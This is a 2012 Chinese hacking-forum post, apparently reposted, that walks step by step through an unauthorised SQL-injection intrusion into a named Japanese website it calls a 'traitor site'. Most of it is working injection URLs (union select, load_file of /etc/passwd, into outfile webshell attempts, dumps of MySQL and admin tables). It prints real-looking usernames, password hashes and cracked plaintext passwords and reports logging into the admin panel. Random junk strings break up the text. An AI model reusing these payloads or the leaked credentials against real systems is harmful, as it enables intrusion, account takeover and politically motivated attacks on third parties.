中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
( }7 ^, m' O, G, j
$ Y" X& e% P$ I" W# m0 u N
0x01. 检测
www.zuaa.jp
收集数据
M: _6 I4 B8 E7 \4 k
[attach]73[/attach]
% L/ Y( Z+ `" r5 H
M2 i+ P- F2 B$ P) z
whatweb
+ }) C( w' {2 Q" \8 d
[attach]74[/attach]
7 U K) I `" M. i
* ^; @0 m, e H5 h1 j- X. I+ G
利用NMAP扫描
$ S9 ]; X( T) \9 t/ Q7 v3 Q- ?
[attach]75[/attach]
% O0 q9 w- N! x" `4 E1 ]
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
* f' w' d7 I8 N. ?) \
0x02.找注入点
2 D" O8 e& N; ]' h. K
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ \7 v( b1 D! r
[attach]76[/attach]
) M2 ]; n' b4 h9 q- o0 P
/ R1 v$ f: S! ]: Q; x
0x03.order by
2 b7 Z& W8 K5 D
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
3 y$ D1 Z$ n9 v; _5 [8 t( r. A+ J
[attach]77[/attach]
4 b, G/ u. ~2 q
order by 28报错,order by 27正常
* U T; K% r: a
8 l/ u8 ~; e4 R8 n& V* g! w
0x04. union手动查询
8 j# ~8 R9 Z4 A- l: r6 G
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
* R# A w- l* ^
添加到 27 时正常显示
2 p% w1 }$ T$ P5 f# R# F
[attach]78[/attach]
" a& W) R" f# S6 t, O
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
" w( e0 h( y. d$ L$ m. M- @
6 c- }; W0 O0 ~" v
0x05. info:
/ w* ]& X5 V. B
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, P6 o7 s4 q2 p
[attach]79[/attach]
* H) D0 t. w) A" h9 k9 \: z
user: root@localhost
, I3 D Z1 [& `$ a
database: openpne
# ?+ N2 d5 L' G# q& t' j
version: 4.1.22
9 [4 n0 C. G4 e8 \) p5 S' H" U7 P
os: portbld-freebsd5.4
' Z+ A! ]! p& _: T" q% X# T) J
% Z. h2 o* F, z4 s3 h
0x06. root用户
" e f* M# k: }$ T
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
7 I) e2 Q! T/ g
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: W4 l2 ~/ f: W5 h
[attach]80[/attach]
( L8 P" f2 B, o& H6 y1 }# n' Q9 l
通过工具转换
1 o" m- U. Q5 E2 ^0 x
[attach]81[/attach]
8 f: ~* r" v4 e( v2 m
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
' B% w8 l, D3 Q; Y5 Z
3 S$ v$ {" Y: c
0x07. 利用 into outfile
9 N- s# S4 {/ q+ O& C; B- I# `- O
全部都失败
+ o; u. C5 b. U
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
6 _' w0 o4 P2 s
$ h! |( b! m( W" j0 W: v. b# w
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
5 j2 r- ^" T$ f2 @: n
' J, S2 G9 r+ {
页面显示“MDB2 Error:syntax error”
# J- _0 T/ v* J& A8 o
/ Y0 r/ w: h- I" t) D" N5 C
0x08. 利用 mysql 4.1
6 r( k2 |6 n3 N" z9 Q0 o1 a# T
猜常规表名,字段未果 工具 sqlmap
+ R9 [& Q5 H/ W( n2 a3 ?$ F
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
6 U0 u1 h3 t$ c: Q5 D+ Y9 H- _
7 o; l' K0 M. q' {# s+ S
[attach]82[/attach]
) M* @- p* {( @- L2 h
3 w+ K/ v, @6 j! V
0x09. 查找后台
p2 }, l: t2 [$ | [5 Z U* G( k
利用 现有的各种 后台工具尝试都不行
: F- h8 v( b: N, s7 N5 b
$ C" n# A; x' M% n* z- Y- A( d
0x10. MySL外联方法
& V8 E* N& N H( ]
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
M. i0 O: ]- m h6 H
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
% v+ ~, _. A* {$ J/ k
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
* z, N& ^" ~4 m
[attach]83[/attach]
% [" r& B4 I" X6 B$ M8 z S
这个可以在
www.cmd5.com
解密
& ^ p- g4 U) g& f/ U6 H
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
/ r C0 `- o6 Y$ v M) l) s2 {
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
% R& t( M9 h) d- N+ B
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 H2 g6 R- E( l/ ]2 }5 Q3 H
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
) C8 a) m# d, C: T
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
4 o" |: M, @( ]3 [4 }- y* P4 o
[attach]84[/attach]
& b7 E0 _/ C0 G" L8 [
$ s5 ^5 @" y: a- s
0x11. 网站突破
6 l! W4 z" F) z+ ^& p
发现网站的源程序 openpne, google 下载 openpne 源码
: ~# j( L- c4 A* s6 s
[attach]85[/attach]
3 H9 P0 V3 f4 L0 g" C& z- w
* f+ F' X3 D; J0 N+ ]1 k1 x$ ~
0x12. 默认信息利用
/ L. \9 G+ p) r3 H! f6 _
http://sns.zuaa.jp/?m=admin&a=page_login
3 l) H, n; M6 y) |8 [+ b- i ^1 q- [
[attach]86[/attach]
! R- c- O9 ~! A8 h9 L, i
表名 (c_admin_user) ,字段名(username,password)
. b3 k) s; J" ~- _' P8 _! F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
; M, f4 x' J* w$ B+ b% c
[attach]87[/attach]
0 @! q5 d5 P- F+ t) Q; U, t
解密
* [9 s# n e- Y9 C8 U- X# N
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
6 n2 B: W! I. D8 Y; A6 w! E
zuaajp:c0923ec5857796a393da99905008c176, zju1897
# v+ r* X' j- g0 t% d5 g5 f. P
' K) p8 x1 V( f6 Q
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
2 ?- r6 p* D) R9 _
; o, w# Q* E4 @
0x13. 登录后台
- [. `: ]) _8 }/ a+ H" u
[attach]88[/attach]
7 k3 o" p* R& t( W6 a/ e& i
0 l# v1 u) ]; w A1 x* V. `7 D
; L4 R R2 E+ b, v, Q) a; w
0x14. 小结
- C2 G9 m! |; O6 n
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
! k7 z0 w" Y/ A7 d$ ^& B% c& q1 j
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
6 t" b) a# y* i* N: ?0 L: O2 \
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
" S% D; j/ N# _1 |" b. h( Z3 B
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
) m* A7 L/ l/ ] r+ ]% H* M2 L
" u" o' \* C& B) T
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
' u9 Y, P+ b$ J; Q
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2